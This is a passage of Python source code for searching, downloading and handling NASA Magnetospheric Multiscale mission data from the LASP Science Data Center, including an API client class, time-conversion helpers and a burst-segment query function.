x.tstart)\n\n\ndef write_csv(filename, data, append=False):\n    '''\n    Write a CSV file with burst data segment selections.\n\n    Parameters\n    ----------\n    filename : str\n        The name of the file to which `data` is to be written\n    data : list of `BurstSegment`\n        Burst segments to be written to the csv file\n    append : bool\n        If True, `data` will be appended to the end of the file.\n    '''\n    header = ('start_time', 'stop_time', 'fom', 'sourceid',\n              'discussion', 'createtime')\n\n    mode = 'w'\n    if append:\n        mode = 'a'\n\n    file = pathlib.Path(filename)\n    with open(file.expanduser(), mode, newline='') as csvfile:\n        csvwriter = csv.writer(csvfile)\n\n        if not append:\n            csvwriter.writerow(header)\n\n        for segment in data:\n            csvwriter.writerow([segment.start_time,\n                                segment.stop_time,\n                                segment.fom,\n                                segment.sourceid,\n                                segment.discussion,\n                                segment.createtime\n                                ]\n                               )\n\n\nif __name__ == '__main__':\n    import sys\n    import pathlib\n    from heliopy import config\n\n    # Inputs (argv[0] is the script name itself)\n    sc = sys.argv[1]\n    start_date = sys.argv[2]\n    if len(sys.argv) == 4:\n        dir = sys.argv[3]\n    else:\n        dir = pathlib.Path(config['download_dir']) / 'figures' / 'mms'\n\n    start_date = dt.datetime.strptime(start_date, '%Y-%m-%dT%H:%M:%S')\n\n    # Plot the data\n    fig = plot_context(sc, start_date, dir=dir)\n\n\n# Instead of importing util, we paste util here and define selections and\n# mrmms_sdc_api as functions before it.\n\n# The following are the functions from selections that we will need.\n\n# The following are the functions from mrmms_sdc_api that we will need.\nimport glob\nimport os\nimport io\nimport re\nimport requests\nimport csv\nimport pymms as pymms\nfrom tqdm import tqdm\nimport datetime as dt\nimport numpy as np\nfrom cdflib import epochs\nfrom urllib.parse import parse_qs\nimport urllib3\nimport warnings\nfrom scipy.io import readsav\nfrom getpass import getpass\nfrom pathlib import Path\n\n\n# data_root = pymms.config['data_root']\n# dropbox_root = pymms.config['dropbox_root']\n# mirror_root = 
pymms.config['mirror_root']\ndata_root = Path(\"\"\" /Users/Riley/PycharmProjects/mms_data/heliopy/heliopy/data/mms \"\"\")\n#dropbox_root = ~/data/mms/dropbox\nmirror_root = None\n\nmms_username = None\nmms_password = None\n\n\nclass MrMMS_SDC_API:\n \"\"\"Interface with NASA's MMS SDC API\n\n Interface with the Science Data Center (SDC) API of the\n Magnetospheric Multiscale (MMS) mission.\n https://lasp.colorado.edu/mms/sdc/public/\n\n Params:\n sc (str,list): Spacecraft IDs ('mms1', 'mms2', 'mms3', 'mms4')\n instr (str,list): Instrument IDs\n mode (str,list): Data rate mode ('slow', 'fast', 'srvy', 'brst')\n level (str,list): Data quality level ('l1a', 'l1b', 'sitl', 'l2pre', 'l2', 'l3')\n data_type (str): Type of data ('ancillary', 'hk', 'science')\n end_date (str): End date of data interval, formatted as either %Y-%m-%d or\n %Y-%m-%dT%H:%M:%S.\n files (str,list): File names. If set, automatically sets `sc`, `instr`, `mode`,\n `level`, `optdesc` and `version` to None.\n offline (bool): Do not search for file information online.\n optdesc (str,list): Optional file name descriptor\n site (str): SDC site to use ('public', 'private'). Setting `level`\n automatically sets `site`. If `level` is 'l2' or 'l3', then\n `site`='public' otherwise `site`='private'.\n start_date (str): Start date of data interval, formatted as either %Y-%m-%d or\n %Y-%m-%dT%H:%M:%S.\n version (str,list): File version numbers.\n \"\"\"\n\n def __init__(self, sc=None, instr=None, mode=None, level=None,\n data_type='science',\n end_date=None,\n files=None,\n offline=False,\n optdesc=None,\n site='public',\n start_date=None,\n version=None):\n\n # Set attributes\n # - Put site before level because level will auto-set site\n # - Put files last because it will reset most fields\n self.site = site\n\n self.data_type = data_type\n self.end_date = end_date\n self.instr = instr\n self.level = level\n self.mode = mode\n self.offline = offline\n self.optdesc = optdesc\n self.sc = sc\n self.start_date = start_date\n self.version = version\n\n self.files = files\n\n self._data_root = data_root\n #self._dropbox_root = dropbox_root\n self._mirror_root = mirror_root\n self._sdc_home = 'https://lasp.colorado.edu/mms/sdc'\n self._info_type = 'download'\n\n # Create a persistent session\n self._session = requests.Session()\n if (mms_username is not None) and (mms_password is not None):\n self._session.auth = (mms_username, mms_password)\n\n def __str__(self):\n return self.url()\n\n # https://stackoverflow.com/questions/17576009/python-class-property-use-setter-but-evade-getter\n def __setattr__(self, name, value):\n \"\"\"Control attribute values as they are set.\"\"\"\n\n # TYPE OF INFO\n # - Unset other complementary options\n # - Ensure that at least one of (download | file_names |\n # version_info | file_info) are true\n if name == 'data_type':\n if 'gls_selections' in value:\n if value[15:] not in ('mp-dl-unh',):\n raise ValueError('Unknown GLS Selections type.')\n elif value not in ('ancillary', 'hk', 'science',\n 'abs_selections', 'sitl_selections',\n 'bdm_sitl_changes'):\n raise ValueError('Invalid value {} for attribute'\n ' \"{}\".'.format(value, name))\n\n # Unset attributes related to data_type = 'science'\n if 'selections' in value:\n self.sc = None\n self.instr = None\n self.mode = None\n self.level = None\n self.optdesc = None\n self.version = None\n\n elif name == 'files':\n if value is not None:\n # Keep track of site because setting\n # self.level = None will set self.site = 'public'\n site = self.site\n self.sc = 
None\n                self.instr = None\n                self.mode = None\n                self.level = None\n                self.optdesc = None\n                self.version = None\n                self.site = site\n\n        elif name == 'level':\n            # L2 and L3 are the only public data levels\n            if value in [None, 'l2', 'l3']:\n                self.site = 'public'\n            else:\n                self.site = 'private'\n\n        elif name == 'site':\n            # Team site is most commonly referred to as the \"team\",\n            # or \"private\" site, but in the URL is referred to as the\n            # \"sitl\" site. Accept any of these values.\n            if value in ('private', 'team', 'sitl'):\n                value = 'sitl'\n            elif value == 'public':\n                value = 'public'\n            else:\n                raise ValueError('Invalid value for attribute {}.'\n                                 .format(name)\n                                 )\n\n        elif name in ('start_date', 'end_date'):\n            # Convert string to datetime object\n            if isinstance(value, str):\n                try:\n                    value = dt.datetime.strptime(value[0:19],\n                                                 '%Y-%m-%dT%H:%M:%S'\n                                                 )\n                except ValueError:\n                    try:\n                        value = dt.datetime.strptime(value, '%Y-%m-%d')\n                    except ValueError:\n                        raise\n\n        # Set the value\n        super(MrMMS_SDC_API, self).__setattr__(name, value)\n\n    def url(self, query=True):\n        \"\"\"\n        Build a URL to query the SDC.\n\n        Parameters\n        ----------\n        query : bool\n            If True (default), add the query string to the url.\n\n        Returns\n        -------\n        url : str\n            URL used to retrieve information from the SDC.\n        \"\"\"\n        sep = '/'\n        url = sep.join((self._sdc_home, self.site, 'files', 'api', 'v1',\n                        self._info_type, self.data_type))\n\n        # Build query from parts of file names\n        if query:\n            query_string = '?'\n            qdict = self.query()\n            for key in qdict:\n                query_string += key + '=' + qdict[key] + '&'\n\n            # Combine URL with query string\n            url += query_string\n\n        return url\n\n    def check_response(self, response):\n        '''\n        Check the status code for a requests response and perform\n        an appropriate action (e.g. log-in, raise error, etc.)\n\n        Parameters\n        ----------\n        response : `requests.response`\n            Response from the SDC\n\n        Returns\n        -------\n        r : `requests.response`\n            Updated response\n        '''\n\n        # OK\n        if response.status_code == 200:\n            r = response\n\n        # Authentication required\n        elif response.status_code == 401:\n            print('Log-in Required')\n\n            maxAttempts = 4\n            nAttempts = 1\n            while nAttempts <= maxAttempts:\n                # First time through will automatically use the\n                # log-in information from the config file. If that\n                # information is wrong/None, ask explicitly\n                if nAttempts == 1:\n                    self.login(mms_username, mms_password)\n                else:\n                    self.login()\n\n                # Remake the request\n                # - Ideally, self._session.send(response.request)\n                # - However, the prepared request lacks the\n                #   authentication data\n                if response.request.method == 'POST':\n                    query = parse_qs(response.request.body)\n                    r = self._session.post(response.request.url, data=query)\n                else:\n                    r = self._session.get(response.request.url)\n\n                # Another attempt\n                if r.ok:\n                    break\n                else:\n                    print('Incorrect username or password. %d tries '\n                          'remaining.' % (maxAttempts - nAttempts))\n                    nAttempts += 1\n\n            # Failed log-in\n            if nAttempts > maxAttempts:\n                raise ConnectionError('Failed log-in.')\n\n        else:\n            raise ConnectionError(response.reason)\n\n        # Return the resulting request\n        return r\n\n    def download_files(self):\n        '''\n        Download files from the SDC. First, search the local file\n        system to see if they have already been downloaded.\n\n        Returns\n        -------\n        local_files : list\n            Names of the local files.\n\n        
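Examples\n        --------\n        A minimal, hypothetical usage sketch; the spacecraft, instrument,\n        mode, and level values below are illustrative only:\n\n        >>> api = MrMMS_SDC_API('mms1', 'fgm', 'srvy', 'l2',\n        ...                     start_date='2020-01-01',\n        ...                     end_date='2020-01-02')\n        >>> files = api.download_files()  # doctest: +SKIP\n        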
'''\n\n        # Get available files\n        local_files, remote_files = self.search()\n        if self.offline:\n            return local_files\n\n        # Download remote files\n        # - file_info() does not want the remote path\n        if len(remote_files) > 0:\n            remote_files = [file.split('/')[-1] for file in remote_files]\n            downloaded_files = self.download_from_sdc(remote_files)\n            local_files.extend(downloaded_files)\n\n        return local_files\n\n    def download_from_sdc(self, file_names):\n        '''\n        Download multiple files from the SDC. To prevent downloading the\n        same file multiple times and to properly filter by file start time\n        see the download_files method.\n\n        Parameters\n        ----------\n        file_names : str, list\n            File names of the data files to be downloaded. See\n            the file_names method.\n\n        Returns\n        -------\n        local_files : list\n            Names of the local files. Remote files downloaded\n            only if they do not already exist locally\n        '''\n\n        # Make sure files is a list\n        if isinstance(file_names, str):\n            file_names = [file_names]\n\n        # Get information on the files that were found\n        # - To do that, specify the specific files.\n        #   This sets all other properties to None\n        # - Save the state of the object as it currently\n        #   is so that it can be restored\n        # - Setting FILES will indirectly cause SITE='public'.\n        #   Keep track of SITE.\n        state = {}\n        state['sc'] = self.sc\n        state['instr'] = self.instr\n        state['mode'] = self.mode\n        state['level'] = self.level\n        state['optdesc'] = self.optdesc\n        state['version'] = self.version\n        state['files'] = self.files\n\n        # Get file name and size\n        self.files = file_names\n        file_info = self.file_info()\n\n        # Build the URL sans query\n        self._info_type = 'download'\n        url = self.url(query=False)\n\n        # Amount to download per iteration\n        block_size = 1024 * 128\n        local_file_names = []\n\n        # Download each file individually\n        for info in file_info['files']:\n            # Create the destination directory\n            file = self.name2path(info['file_name'])\n            if not os.path.isdir(os.path.dirname(file)):\n                os.makedirs(os.path.dirname(file))\n\n            # downloading: https://stackoverflow.com/questions/16694907/how-to-download-large-file-in-python-with-requests-py\n            # progress bar: https://stackoverflow.com/questions/37573483/progress-bar-while-download-file-over-http-with-requests\n            try:\n                r = self._session.get(url,\n                                      params={'file': info['file_name']},\n                                      stream=True)\n                with tqdm(total=info['file_size'],\n                          unit='B',\n                          unit_scale=True,\n                          unit_divisor=1024\n                          ) as pbar:\n                    with open(file, 'wb') as f:\n                        for chunk in r.iter_content(chunk_size=block_size):\n                            if chunk:  # filter out keep-alive new chunks\n                                f.write(chunk)\n                                pbar.update(block_size)\n            except:\n                if os.path.isfile(file):\n                    os.remove(file)\n                for key in state:\n                    self.files = None\n                    setattr(self, key, state[key])\n                raise\n\n            local_file_names.append(file)\n\n        # Restore the entry state\n        self.files = None\n        for key in state:\n            setattr(self, key, state[key])\n\n        return local_file_names\n\n    def download_from_sdc_v1(self, file_names):\n        '''\n        Download multiple files from the SDC. To prevent downloading the\n        same file multiple times and to properly filter by file start time\n        see the download_files method.\n\n        This version of the program calls `self.file_info()` for each\n        file name given, whereas `download_from_sdc` calls it once\n        for all files. 
In the event of many files, `self.get()` was\n altered to use `requests.post()` instead of `requests.get()`\n if the url was too long (i.e. too many files).\n\n Parameters\n ----------\n file_names : str, list\n File names of the data files to be downloaded. See\n the file_names method.\n\n Returns\n -------\n local_files : list\n Names of the local files. Remote files downloaded\n only if they do not already exist locally\n '''\n\n # Make sure files is a list\n if isinstance(file_names, str):\n file_names = [file_names]\n\n # Get information on the files that were found\n # - To do that, specify the specific files.\n # This sets all other properties to None\n # - Save the state of the object as it currently\n # is so that it can be restored\n # - Setting FILES will indirectly cause SITE='public'.\n # Keep track of SITE.\n site = self.site\n state = {}\n state['sc'] = self.sc\n state['instr'] = self.instr\n state['mode'] = self.mode\n state['level'] = self.level\n state['optdesc'] = self.optdesc\n state['version'] = self.version\n state['files'] = self.files\n\n # Build the URL sans query\n self.site = site\n self._info_type = 'download'\n url = self.url(query=False)\n\n # Amount to download per iteration\n block_size = 1024 * 128\n local_file_names = []\n\n # Download each file individually\n for file_name in file_names:\n self.files = file_name\n info = self.file_info()['files'][0]\n\n # Create the destination directory\n file = self.name2path(info['file_name'])\n if not os.path.isdir(os.path.dirname(file)):\n os.makedirs(os.path.dirname(file))\n\n # downloading: https://stackoverflow.com/questions/16694907/how-to-download-large-file-in-python-with-requests-py\n # progress bar: https://stackoverflow.com/questions/37573483/progress-bar-while-download-file-over-http-with-requests\n try:\n r = self._session.get(url,\n params={'file': info['file_name']},\n stream=True)\n with tqdm(total=info['file_size'],\n unit='B',\n unit_scale=True,\n unit_divisor=1024\n ) as pbar:\n with open(file, 'wb') as f:\n for chunk in r.iter_content(chunk_size=block_size):\n if chunk: # filter out keep-alive new chunks\n f.write(chunk)\n pbar.update(block_size)\n except:\n if os.path.isfile(file):\n os.remove(file)\n for key in state:\n self.files = None\n setattr(self, key, state[key])\n raise\n\n local_file_names.append(file)\n\n # Restore the entry state\n self.files = None\n for key in state:\n setattr(self, key, state[key])\n\n return local_file_names\n\n def download(self):\n '''\n Download multiple files. First, search the local file system\n to see if any of the files have been downloaded previously.\n\n Returns\n -------\n local_files : list\n Names of the local files. Remote files downloaded\n only if they do not already exist locally\n '''\n warnings.warn('This method will be removed in the future. Use the get method.',\n DeprecationWarning)\n\n self._info_type = 'download'\n # Build the URL sans query\n url = self.url(query=False)\n\n # Get available files\n local_files, remote_files = self.search()\n if self.offline:\n return local_files\n\n # Get information on the files that were found\n # - To do that, specify the specific files. This sets all other\n # properties to None\n # - Save the state of the object as it currently is so that it can\n # be restored\n # - Setting FILES will indirectly cause SITE='public'. 
Keep track\n        #   of SITE.\n        site = self.site\n        state = {}\n        state['sc'] = self.sc\n        state['instr'] = self.instr\n        state['mode'] = self.mode\n        state['level'] = self.level\n        state['optdesc'] = self.optdesc\n        state['version'] = self.version\n        state['files'] = self.files\n        self.files = [file.split('/')[-1] for file in remote_files]\n\n        self.site = site\n        file_info = self.file_info()\n\n        # Amount to download per iteration\n        block_size = 1024 * 128\n\n        # Download each file individually\n        for info in file_info['files']:\n            # Create the destination directory\n            file = self.name2path(info['file_name'])\n            if not os.path.isdir(os.path.dirname(file)):\n                os.makedirs(os.path.dirname(file))\n\n            # Downloading and progress bar:\n            # https://stackoverflow.com/questions/16694907/how-to-download-large-file-in-python-with-requests-py\n            # https://stackoverflow.com/questions/37573483/progress-bar-while-download-file-over-http-with-requests\n            try:\n                r = self._session.post(url,\n                                       data={'file': info['file_name']},\n                                       stream=True)\n                with tqdm(total=info['file_size'], unit='B', unit_scale=True,\n                          unit_divisor=1024) as pbar:\n                    with open(file, 'wb') as f:\n                        for chunk in r.iter_content(chunk_size=block_size):\n                            if chunk:  # filter out keep-alive new chunks\n                                f.write(chunk)\n                                pbar.update(block_size)\n            except:\n                if os.path.isfile(file):\n                    os.remove(file)\n                for key in state:\n                    self.files = None\n                    setattr(self, key, state[key])\n                raise\n\n            local_files.append(file)\n\n        self.files = None\n        for key in state:\n            setattr(self, key, state[key])\n\n        return local_files\n\n    def file_info(self):\n        '''\n        Obtain file information from the SDC.\n\n        Returns\n        -------\n        file_info : list\n            Information about each file.\n        '''\n        self._info_type = 'file_info'\n        response = self.get()\n        return response.json()\n\n    def file_names(self):\n        '''\n        Obtain file names from the SDC. Note that the SDC accepts only\n        start and end dates, not datetimes. Therefore the files returned\n        by this function may lie outside the time interval of interest.\n        For a more precise list of file names, use the search method or\n        filter the files with filter_time.\n\n        Returns\n        -------\n        file_names : list\n            Names of the requested files.\n        '''\n        self._info_type = 'file_names'\n        response = self.get()\n\n        # If no files were found, the empty string is the response\n        # Return [] instead of [''] so that len() is zero.\n        if response.text == '':\n            return []\n        return response.text.split(',')\n\n    def get(self):\n        '''\n        Retrieve information from the SDC.\n\n        Returns\n        -------\n        r : `session.response`\n            Response to the request posted to the SDC.\n        '''\n        # Build the URL sans query\n        url = self.url(query=False)\n\n        # Check on query\n        # - Use POST if the URL is too long\n        r = self._session.get(url, params=self.query())\n        if r.status_code == 414:\n            r = self._session.post(url, data=self.query())\n\n        # Check if everything is ok\n        if not r.ok:\n            r = self.check_response(r)\n\n        # Return the response for the requested URL\n        return r\n\n    def local_file_names(self, mirror=False):\n        '''\n        Search for MMS files on the local system. Files must be\n        located in an MMS-like directory structure.\n\n        Parameters\n        ----------\n        mirror : bool\n            If False (default), the local data directory is used as the\n            root directory. 
Otherwise the mirror directory is\n used.\n\n Returns\n -------\n local_files : list\n Names of the local files\n '''\n\n # Search the mirror or local directory\n if mirror:\n data_root = self._mirror_root\n else:\n data_root = self._data_root\n\n # If no start or end date have been defined,\n # - Start at beginning of mission\n # - End at today's date\n start_date = self.start_date\n end_date = self.end_date\n\n # Create all dates between start_date and end_date\n deltat = dt.timedelta(days=1)\n dates = []\n while start_date <= end_date:\n dates.append(start_date.strftime('%Y%m%d'))\n start_date += deltat\n\n # Paths in which to look for files\n # - Files of all versions and times within interval\n if 'selections' in self.data_type:\n paths = construct_path(data_type=self.data_type,\n root=data_root, files=True)\n else:\n paths = construct_path(self.sc, self.instr, self.mode, self.level,\n dates, optdesc=self.optdesc,\n root=data_root, files=True)\n\n # Search\n result = []\n pwd = os.getcwd()\n for path in paths:\n root = os.path.dirname(path)\n\n try:\n os.chdir(root)\n except FileNotFoundError:\n continue\n except:\n os.chdir(pwd)\n raise\n\n for file in glob.glob(os.path.basename(path)):\n result.append(os.path.join(root, file))\n\n os.chdir(pwd)\n\n return result\n\n def login(self, username=None, password=None):\n '''\n Log-In to the SDC\n\n Parameters\n ----------\n username (str): Account username\n password (str): Account password\n '''\n\n # Ask for inputs\n if username is None:\n username = input('username: ')\n\n if password is None:\n password = input('password: ')\n\n # Save credentials\n self._session.auth = (username, password)\n\n def name2path(self, filename):\n '''\n Convert remote file names to local file name.\n\n Directories of a remote file name are separated by the '/' character,\n as in a web address.\n\n Parameters\n ----------\n filename : str\n File name for which the local path is desired.\n\n Returns\n -------\n path : str\n Equivalent local file name. This is the location to\n which local files are downloaded.\n '''\n parts = filename.split('_')\n\n # burst data selection directories and file names are structured as\n # - dirname: sitl/[type]_selections/\n # - basename: [type]_selections_[optdesc]_YYYY-MM-DD-hh-mm-ss.sav\n # To get year, index from end to skip optional descriptor\n if parts[1] == 'selections':\n path = os.path.join(self._data_root, 'sitl',\n '_'.join(parts[0:2]),\n filename)\n\n # Burst directories and file names are structured as:\n # - dirname: sc/instr/mode/level[/optdesc]/YYYY/MM/DD/\n # - basename: sc_instr_mode_level[_optdesc]_YYYYMMDDhhmmss_vX.Y.Z.cdf\n # Index from end to catch the optional descriptor, if it exists\n elif parts[2] == 'brst':\n path = os.path.join(self._data_root, *parts[0:-2],\n parts[-2][0:4], parts[-2][4:6],\n parts[-2][6:8], filename)\n\n # Survey (slow,fast,srvy) directories and file names are structured as:\n # - dirname: sc/instr/mode/level[/optdesc]/YYYY/MM/\n # - basename: sc_instr_mode_level[_optdesc]_YYYYMMDD_vX.Y.Z.cdf\n # Index from end to catch the optional descriptor, if it exists\n else:\n path = os.path.join(self._data_root, *parts[0:-2],\n parts[-2][0:4], parts[-2][4:6], filename)\n\n return path\n\n def parse_file_names(self, filename):\n '''\n Parse an official MMS file name. 
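For example, the (hypothetical) name\n        'mms1_fgm_srvy_l2_20200101_v4.5.0.cdf' parses to\n        ('mms1', 'fgm', 'srvy', 'l2', '', '20200101', 'v4.5.0').\n\n        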
MMS file names are formatted as\n sc_instr_mode_level[_optdesc]_tstart_vX.Y.Z.cdf\n where\n sc: spacecraft id\n instr: instrument id\n mode: data rate mode\n level: data level\n optdesc: optional filename descriptor\n tstart: start time of file\n vX.Y.Z: file version, with X, Y, and Z version numbers\n\n Parameters\n ----------\n filename : str\n An MMS file name\n\n Returns\n -------\n parts : tuple\n A tuples ordered as\n (sc, instr, mode, level, optdesc, tstart, version)\n If opdesc is not present in the file name, the output will\n contain the empty string ('').\n '''\n parts = os.path.basename(filename).split('_')\n\n # If the file does not have an optional descriptor,\n # put an empty string in its place.\n if len(parts) == 6:\n parts.insert(-2, '')\n\n # Remove the file extension ``.cdf''\n parts[-1] = parts[-1][0:-4]\n return tuple(parts)\n\n def post(self):\n '''\n Retrieve data from the SDC.\n\n Returns\n -------\n r : `session.response`\n Response to the request posted to the SDC.\n '''\n # Build the URL sans query\n url = self.url(query=False)\n\n # Check on query\n r = self._session.post(url, data=self.query())\n\n # Check if everything is ok\n if not r.ok:\n r = self.check_response(r)\n\n # Return the response for the requested URL\n return r\n\n def query(self):\n '''\n build a dictionary of key-value pairs that serve as the URL\n query string.\n\n Returns\n -------\n query : dict\n URL query\n '''\n\n # Adjust end date\n # - The query takes '%Y-%m-%d' but the object allows\n # '%Y-%m-%dT%H:%M:%S'\n # - Further, the query is half-exclusive: [start, end)\n # - If the dates are the same but the times are different, then\n # files between self.start_date and self.end_date will not be\n # found\n # - In these circumstances, increase the end date by one day\n if self.end_date is not None:\n end_date = self.end_date.strftime('%Y-%m-%d')\n if self.start_date.date() == self.end_date.date() or \\\n self.end_date.time() != dt.time(0, 0, 0):\n end_date = (self.end_date + dt.timedelta(1)\n ).strftime('%Y-%m-%d')\n\n query = {}\n if self.sc is not None:\n query['sc_id'] = self.sc if isinstance(self.sc, str) \\\n else ','.join(self.sc)\n if self.instr is not None:\n query['instrument_id'] = self.instr \\\n if isinstance(self.instr, str) \\\n else ','.join(self.instr)\n if self.mode is not None:\n query['data_rate_mode'] = self.mode if isinstance(self.mode, str) \\\n else ','.join(self.mode)\n if self.level is not None:\n query['data_level'] = self.level if isinstance(self.level, str) \\\n else ','.join(self.level)\n if self.optdesc is not None:\n query['descriptor'] = self.optdesc \\\n if isinstance(self.optdesc, str) \\\n else ','.join(self.optdesc)\n if self.version is not None:\n query['version'] = self.version if isinstance(self.version, str) \\\n else ','.join(self.version)\n if self.files is not None:\n query['files'] = self.files if isinstance(self.files, str) \\\n else ','.join(self.files)\n if self.start_date is not None:\n query['start_date'] = self.start_date.strftime('%Y-%m-%d')\n if self.end_date is not None:\n query['end_date'] = end_date\n\n return query\n\n def remote2localnames(self, remote_names):\n '''\n Convert remote file names to local file names.\n\n Directories of a remote file name are separated by the '/' character,\n as in a web address.\n\n Parameters\n ----------\n remote_names : list\n Remote file names returned by FileNames.\n\n Returns\n -------\n local_names : list\n Equivalent local file name. 
This is the location to\n            which local files are downloaded.\n        '''\n        # os.path.join() requires string arguments\n        # - str.split() returns a list.\n        # - Unpack with *: https://docs.python.org/2/tutorial/controlflow.html#unpacking-argument-lists\n        local_names = list()\n        for file in remote_names:\n            local_names.append(os.path.join(self._data_root,\n                                            *file.split('/')[2:]))\n\n        if (len(remote_names) == 1) and isinstance(remote_names, str):\n            local_names = local_names[0]\n\n        return local_names\n\n    def search(self):\n        '''\n        Search for files locally and at the SDC.\n\n        Returns\n        -------\n        files : tuple\n            Local and remote files within the interval, returned as\n            (local, remote), where `local` and `remote` are lists.\n        '''\n\n        # Search locally if offline\n        if self.offline:\n            local_files = self.local_file_names()\n            remote_files = []\n\n        # Search remote first\n        # - SDC is definitive source of files\n        # - Returns most recent version\n        else:\n            remote_files = self.file_names()\n\n            # Search for the equivalent local file names\n            local_files = self.remote2localnames(remote_files)\n            idx = [i for i, local in enumerate(local_files)\n                   if os.path.isfile(local)\n                   ]\n\n            # Filter based on location\n            local_files = [local_files[i] for i in idx]\n            remote_files = [remote_files[i] for i in range(len(remote_files))\n                            if i not in idx\n                            ]\n\n        # Filter based on time interval\n        if len(local_files) > 0:\n            local_files = filter_time(local_files,\n                                      self.start_date,\n                                      self.end_date\n                                      )\n        if len(remote_files) > 0:\n            remote_files = filter_time(remote_files,\n                                       self.start_date,\n                                       self.end_date\n                                       )\n\n        return (local_files, remote_files)\n\n    def version_info(self):\n        '''\n        Obtain version information from the SDC.\n\n        Returns\n        -------\n        vinfo : dict\n            Version information regarding the requested files\n        '''\n        self._info_type = 'version_info'\n        response = self.post()\n        return response.json()\n\n\ndef _datetime_to_list(datetime):\n    return [datetime.year, datetime.month, datetime.day,\n            datetime.hour, datetime.minute, datetime.second,\n            datetime.microsecond // 1000, datetime.microsecond % 1000, 0\n            ]\n\n\ndef datetime_to_tai(t_datetime):\n    # Convert datetime to TAI\n    # - TAI timestamps are TAI seconds elapsed since 1958-01-01\n    return tt2000_to_tai(datetime_to_tt2000(t_datetime))\n\n\ndef datetime_to_tt2000(t_datetime):\n    # Convert datetime to TT2000\n    # - TT2000 are TAI nanoseconds elapsed since 2000-01-01\n    t_list = _datetime_to_list(t_datetime)\n    return epochs.CDFepoch.compute_tt2000(t_list)\n\n\ndef tai_to_tt2000(t_tai):\n    # Convert TAI to TT2000\n    # - TAI timestamps are TAI seconds elapsed since 1958-01-01\n    # - TT2000 are TAI nanoseconds elapsed since 2000-01-01\n    t_1958 = epochs.CDFepoch.compute_tt2000([1958, 1, 1, 0, 0, 0, 0, 0, 0])\n    return np.asarray(t_tai) * int(1e9) + t_1958\n\n\ndef tai_to_datetime(t_tai):\n    # Convert TAI to datetime\n    # - TAI timestamps are TAI seconds elapsed since 1958-01-01\n    return tt2000_to_datetime(tai_to_tt2000(t_tai))\n\n\ndef tt2000_to_tai(t_tt2000):\n    # Convert TT2000 to TAI\n    # - TAI timestamps are TAI seconds elapsed since 1958-01-01\n    # - TT2000 are TAI nanoseconds elapsed since 2000-01-01\n    t_1958 = epochs.CDFepoch.compute_tt2000([1958, 1, 1, 0, 0, 0, 0, 0, 0])\n    return (t_tt2000 - t_1958) // int(1e9)\n\n\ndef tt2000_to_datetime(t_tt2000):\n    # Convert TT2000 to datetime\n    # - TT2000 are TAI nanoseconds elapsed since 2000-01-01\n    tepoch = epochs.CDFepoch()\n    return tepoch.to_datetime(t_tt2000)\n\n\ndef _response_text_to_dict(text):\n    # Read first line as dict keys. 
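\n    # (For example, a hypothetical header key 'start_time_utc (yyyy-mm-dd)'\n    # is shortened to 'start_time' by the regex below.)\n    # 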
Cut text from TAI keys\n f = io.StringIO(text)\n reader = csv.reader(f, delimiter=',')\n\n # Create a dictionary from the header\n data = dict()\n for key in next(reader):\n\n # See sitl_selections()\n if key.startswith(('start_time', 'end_time')):\n match = re.search('((start|end)_time)_utc', key)\n key = match.group(1)\n\n # See burst_data_segments()\n elif key.startswith('TAI'):\n match = re.search('(TAI(START|END)TIME)', key)\n key = match.group(1)\n\n data[key.lower()] = []\n\n # Read remaining lines into columns\n keys = data.keys()\n for row in reader:\n for key, value in zip(keys, row):\n data[key].append(value)\n\n return data\n\n\ndef burst_data_segments(start_date, end_date,\n team=False, username=None):\n \"\"\"\n Get information about burst data segments. Burst segments that\n were selected in the back structure are available through this\n service, but not through `sitl_selections()`. Also, the time\n between contiguous segments is 10 seconds.\n\n Parameters\n ----------\n start_date : `datetime`\n Start date of time interval for which information is desired.\n end_date : `datetime`\n End date of time interval for which information is desired.\n team : bool=False\n If set, information will be taken from the team site\n (login required). Otherwise, it is take from the public site.\n\n Returns\n -------\n data : dict\n Dictionary of information about burst data segments\n datasegmentid\n taistarttime - Start time of burst segment in\n TAI sec since 1958-01-01\n taiendtime - End time of burst segment in\n TAI sec since 1958-01-01\n parametersetid\n fom - Figure of merit given to the burst segment\n ispending\n inplaylist\n status - Download status of the segment\n numevalcycles\n sourceid - Username of SITL who selected the segment\n createtime - Time the selections were submitted as datetime (?)\n finishtime - Time the selections were downlinked as datetime (?)\n obs1numbufs\n obs2numbufs\n obs3numbufs\n obs4numbufs\n obs1allocbufs\n obs2allocbufs\n obs3allocbufs\n obs4allocbufs\n obs1remfiles\n obs2remfiles\n obs3remfiles\n obs4remfiles\n discussion - Description given to segment by SITL\n dt - Duration of burst segment in seconds\n tstart - Start time of burst segment as datetime\n tstop - End time of burst segment as datetime\n \"\"\"\n\n # Convert times to TAI since 1958\n t0 = _datetime_to_list(start_date)\n t1 = _datetime_to_list(end_date)\n t_1958 = epochs.CDFepoch.compute_tt2000([1958, 1, 1, 0, 0, 0, 0, 0, 0])\n t0 = int((epochs.CDFepoch.compute_tt2000(t0) - t_1958) // 1e9)\n t1 = int((epochs.CDFepoch.compute_tt2000(t1) - t_1958) // 1e9)\n\n # URL\n url_path = 'https://lasp.colorado.edu/mms/sdc/'\n url_path += 'sitl/latis/dap/' if team else 'public/service/latis/'\n url_path += 'mms_burst_data_segment.csv'\n\n # Query string\n query = {}\n query['TAISTARTTIME>'] = '{0:d}'.format(t0)\n query['TAIENDTIME<'] = '{0:d}'.format(t1)\n\n # Post the query\n # cookies = None\n # if team:\n # cookies = sdc_login(username)\n\n # Get the log-in information\n sesh = requests.Session()\n r = sesh.get(url_path, params=query)\n if r.status_code != 200:\n raise ConnectionError('{}: {}'.format(r.status_code, r.reason))\n\n # Read first line as dict keys. 
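\n    # (The parsed result is a dict of column lists keyed by lower-case\n    # names, e.g. data['taistarttime'], data['fom'], data['sourceid'].)\n    # 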
